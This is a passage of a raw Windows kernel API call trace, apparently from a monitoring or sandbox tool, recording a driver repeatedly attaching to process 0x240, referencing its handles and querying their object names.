DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697b4f20, HandleInformation=0x0) returned 0x0 [0289.596] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.596] PsReleaseProcessExitSynchronization () returned 0x2 [0289.596] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78171 [0289.596] ObQueryNameString (in: Object=0xffffe000697b4f20, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.596] ObfDereferenceObject (Object=0xffffe000697b4f20) returned 0x7ffe [0289.596] IoCompleteRequest () returned 0x0 [0289.596] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.596] PsAcquireProcessExitSynchronization () returned 0x0 [0289.596] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.596] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697b1950, HandleInformation=0x0) returned 0x0 [0289.596] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.596] PsReleaseProcessExitSynchronization () returned 0x2 [0289.596] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78170 [0289.596] ObQueryNameString (in: Object=0xffffe000697b1950, ObjectNameInfo=0xffffe0006a2c5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2c5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.596] ObfDereferenceObject (Object=0xffffe000697b1950) returned 0x7ffe [0289.596] IoCompleteRequest () returned 0x0 [0289.596] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.596] PsAcquireProcessExitSynchronization () returned 0x0 [0289.596] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.596] ObReferenceObjectByHandle (in: Handle=0x148, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697b31f0, HandleInformation=0x0) returned 0x0 [0289.596] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.596] PsReleaseProcessExitSynchronization () returned 0x2 [0289.596] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7816f [0289.596] ObQueryNameString (in: Object=0xffffe000697b31f0, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.596] ObfDereferenceObject (Object=0xffffe000697b31f0) returned 0x7ffc [0289.596] IoCompleteRequest () returned 0x0 [0289.596] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.596] PsAcquireProcessExitSynchronization () returned 0x0 [0289.596] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.596] ObReferenceObjectByHandle (in: Handle=0x154, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697b4580, HandleInformation=0x0) returned 0x0 [0289.596] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.596] PsReleaseProcessExitSynchronization () returned 0x2 [0289.596] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7816e [0289.596] ObQueryNameString (in: Object=0xffffe000697b4580, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.596] ObfDereferenceObject (Object=0xffffe000697b4580) returned 0x7ffe [0289.596] IoCompleteRequest () returned 0x0 [0289.597] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.597] PsAcquireProcessExitSynchronization () returned 0x0 [0289.597] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.597] ObReferenceObjectByHandle (in: Handle=0x2a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697df250, HandleInformation=0x0) returned 0x0 [0289.597] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.597] PsReleaseProcessExitSynchronization () returned 0x2 [0289.597] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7816d [0289.597] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.597] ObfDereferenceObject (Object=0xffffe000697df250) returned 0x7ffd [0289.597] IoCompleteRequest () returned 0x0 [0289.597] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.597] PsAcquireProcessExitSynchronization () returned 0x0 [0289.597] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.597] ObReferenceObjectByHandle (in: Handle=0x314, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697e4f20, HandleInformation=0x0) returned 0x0 [0289.597] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.597] PsReleaseProcessExitSynchronization () returned 0x2 [0289.597] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7816c [0289.597] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.597] ObfDereferenceObject (Object=0xffffe000697e4f20) returned 0x7ffb [0289.597] IoCompleteRequest () returned 0x0 [0289.597] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.597] PsAcquireProcessExitSynchronization () returned 0x0 [0289.597] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.597] ObReferenceObjectByHandle (in: Handle=0x45c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697e9530, HandleInformation=0x0) returned 0x0 [0289.597] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.597] PsReleaseProcessExitSynchronization () returned 0x2 [0289.597] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7816b [0289.597] ObQueryNameString (in: Object=0xffffe000697e9530, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.597] ObfDereferenceObject (Object=0xffffe000697e9530) returned 0x7ffd [0289.597] IoCompleteRequest () returned 0x0 [0289.597] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.597] PsAcquireProcessExitSynchronization () returned 0x0 [0289.597] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.597] ObReferenceObjectByHandle (in: Handle=0x460, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697e96a0, HandleInformation=0x0) returned 0x0 [0289.597] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.597] PsReleaseProcessExitSynchronization () returned 0x2 [0289.597] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7816a [0289.597] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.597] ObfDereferenceObject (Object=0xffffe000697e96a0) returned 0x7fff [0289.597] IoCompleteRequest () returned 0x0 [0289.597] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.597] PsAcquireProcessExitSynchronization () returned 0x0 [0289.597] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.597] ObReferenceObjectByHandle (in: Handle=0x464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697e93c0, HandleInformation=0x0) returned 0x0 [0289.598] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.598] PsReleaseProcessExitSynchronization () returned 0x2 [0289.598] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78169 [0289.598] ObQueryNameString (in: Object=0xffffe000697e93c0, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.598] ObfDereferenceObject (Object=0xffffe000697e93c0) returned 0x7ffd [0289.598] IoCompleteRequest () returned 0x0 [0289.598] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.598] PsAcquireProcessExitSynchronization () returned 0x0 [0289.598] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.598] ObReferenceObjectByHandle (in: Handle=0x558, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069843980, HandleInformation=0x0) returned 0x0 [0289.598] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.598] PsReleaseProcessExitSynchronization () returned 0x2 [0289.598] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78168 [0289.598] ObQueryNameString (in: Object=0xffffe00069843980, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.598] ObfDereferenceObject (Object=0xffffe00069843980) returned 0x7ffe [0289.598] IoCompleteRequest () returned 0x0 [0289.598] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.598] PsAcquireProcessExitSynchronization () returned 0x0 [0289.598] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.598] ObReferenceObjectByHandle (in: Handle=0x55c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069843290, HandleInformation=0x0) returned 0x0 [0289.598] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.598] PsReleaseProcessExitSynchronization () returned 0x2 [0289.598] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78167 [0289.598] ObQueryNameString (in: Object=0xffffe00069843290, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.598] ObfDereferenceObject (Object=0xffffe00069843290) returned 0x7ffe [0289.598] IoCompleteRequest () returned 0x0 [0289.598] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.598] PsAcquireProcessExitSynchronization () returned 0x0 [0289.598] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.598] ObReferenceObjectByHandle (in: Handle=0x560, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069844da0, HandleInformation=0x0) returned 0x0 [0289.598] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.598] PsReleaseProcessExitSynchronization () returned 0x2 [0289.598] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78166 [0289.598] ObQueryNameString (in: Object=0xffffe00069844da0, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.598] ObfDereferenceObject (Object=0xffffe00069844da0) returned 0x7ffe [0289.598] IoCompleteRequest () returned 0x0 [0289.598] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.598] PsAcquireProcessExitSynchronization () returned 0x0 [0289.598] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.598] ObReferenceObjectByHandle (in: Handle=0x564, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006983e3b0, HandleInformation=0x0) returned 0x0 [0289.598] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.598] PsReleaseProcessExitSynchronization () returned 0x2 [0289.598] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78165 [0289.598] ObQueryNameString (in: Object=0xffffe0006983e3b0, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.598] ObfDereferenceObject (Object=0xffffe0006983e3b0) returned 0x7ffe [0289.598] IoCompleteRequest () returned 0x0 [0289.599] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.599] PsAcquireProcessExitSynchronization () returned 0x0 [0289.599] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.599] ObReferenceObjectByHandle (in: Handle=0x568, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069844730, HandleInformation=0x0) returned 0x0 [0289.599] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.599] PsReleaseProcessExitSynchronization () returned 0x2 [0289.599] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78164 [0289.599] ObQueryNameString (in: Object=0xffffe00069844730, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.599] ObfDereferenceObject (Object=0xffffe00069844730) returned 0x7ffe [0289.599] IoCompleteRequest () returned 0x0 [0289.599] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.599] PsAcquireProcessExitSynchronization () returned 0x0 [0289.599] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.599] ObReferenceObjectByHandle (in: Handle=0x56c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069843690, HandleInformation=0x0) returned 0x0 [0289.599] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.599] PsReleaseProcessExitSynchronization () returned 0x2 [0289.599] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78163 [0289.599] ObQueryNameString (in: Object=0xffffe00069843690, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.599] ObfDereferenceObject (Object=0xffffe00069843690) returned 0x7ffe [0289.599] IoCompleteRequest () returned 0x0 [0289.599] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.599] PsAcquireProcessExitSynchronization () returned 0x0 [0289.599] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.599] ObReferenceObjectByHandle (in: Handle=0x570, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069845f20, HandleInformation=0x0) returned 0x0 [0289.599] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.599] PsReleaseProcessExitSynchronization () returned 0x2 [0289.599] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78162 [0289.599] ObQueryNameString (in: Object=0xffffe00069845f20, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.599] ObfDereferenceObject (Object=0xffffe00069845f20) returned 0x7ffe [0289.599] IoCompleteRequest () returned 0x0 [0289.599] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.599] PsAcquireProcessExitSynchronization () returned 0x0 [0289.599] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.599] ObReferenceObjectByHandle (in: Handle=0x574, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069845830, HandleInformation=0x0) returned 0x0 [0289.599] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.599] PsReleaseProcessExitSynchronization () returned 0x2 [0289.599] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78161 [0289.599] ObQueryNameString (in: Object=0xffffe00069845830, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.599] ObfDereferenceObject (Object=0xffffe00069845830) returned 0x7ffe [0289.599] IoCompleteRequest () returned 0x0 [0289.599] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.599] PsAcquireProcessExitSynchronization () returned 0x0 [0289.599] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.599] ObReferenceObjectByHandle (in: Handle=0x578, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069843090, HandleInformation=0x0) returned 0x0 [0289.599] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.600] PsReleaseProcessExitSynchronization () returned 0x2 [0289.600] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78160 [0289.600] ObQueryNameString (in: Object=0xffffe00069843090, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.600] ObfDereferenceObject (Object=0xffffe00069843090) returned 0x7ffe [0289.600] IoCompleteRequest () returned 0x0 [0289.600] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.600] PsAcquireProcessExitSynchronization () returned 0x0 [0289.600] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.600] ObReferenceObjectByHandle (in: Handle=0x57c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069843810, HandleInformation=0x0) returned 0x0 [0289.600] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.600] PsReleaseProcessExitSynchronization () returned 0x2 [0289.600] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7815f [0289.600] ObQueryNameString (in: Object=0xffffe00069843810, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.600] ObfDereferenceObject (Object=0xffffe00069843810) returned 0x7ffe [0289.600] IoCompleteRequest () returned 0x0 [0289.600] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.600] PsAcquireProcessExitSynchronization () returned 0x0 [0289.600] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.600] ObReferenceObjectByHandle (in: Handle=0x580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069845db0, HandleInformation=0x0) returned 0x0 [0289.600] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.600] PsReleaseProcessExitSynchronization () returned 0x2 [0289.600] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7815e [0289.600] ObQueryNameString (in: Object=0xffffe00069845db0, ObjectNameInfo=0xffffe0006a2c5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2c5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.600] ObfDereferenceObject (Object=0xffffe00069845db0) returned 0x7ffe [0289.600] IoCompleteRequest () returned 0x0 [0289.600] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.600] PsAcquireProcessExitSynchronization () returned 0x0 [0289.600] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.600] ObReferenceObjectByHandle (in: Handle=0x584, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698454c0, HandleInformation=0x0) returned 0x0 [0289.600] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.600] PsReleaseProcessExitSynchronization () returned 0x2 [0289.600] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7815d [0289.600] ObQueryNameString (in: Object=0xffffe000698454c0, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.600] ObfDereferenceObject (Object=0xffffe000698454c0) returned 0x7ffe [0289.600] IoCompleteRequest () returned 0x0 [0289.600] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.600] PsAcquireProcessExitSynchronization () returned 0x0 [0289.600] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.600] ObReferenceObjectByHandle (in: Handle=0x588, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069846b20, HandleInformation=0x0) returned 0x0 [0289.600] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.600] PsReleaseProcessExitSynchronization () returned 0x2 [0289.600] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7815c [0289.600] ObQueryNameString (in: Object=0xffffe00069846b20, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.600] ObfDereferenceObject (Object=0xffffe00069846b20) returned 0x7ffe [0289.601] IoCompleteRequest () returned 0x0 [0289.601] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.601] PsAcquireProcessExitSynchronization () returned 0x0 [0289.601] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.601] ObReferenceObjectByHandle (in: Handle=0x58c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069847f20, HandleInformation=0x0) returned 0x0 [0289.601] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.601] PsReleaseProcessExitSynchronization () returned 0x2 [0289.601] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7815b [0289.601] ObQueryNameString (in: Object=0xffffe00069847f20, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.601] ObfDereferenceObject (Object=0xffffe00069847f20) returned 0x7ffe [0289.601] IoCompleteRequest () returned 0x0 [0289.601] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.601] PsAcquireProcessExitSynchronization () returned 0x0 [0289.601] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.601] ObReferenceObjectByHandle (in: Handle=0x590, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069847830, HandleInformation=0x0) returned 0x0 [0289.601] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.601] PsReleaseProcessExitSynchronization () returned 0x2 [0289.601] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7815a [0289.601] ObQueryNameString (in: Object=0xffffe00069847830, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.601] 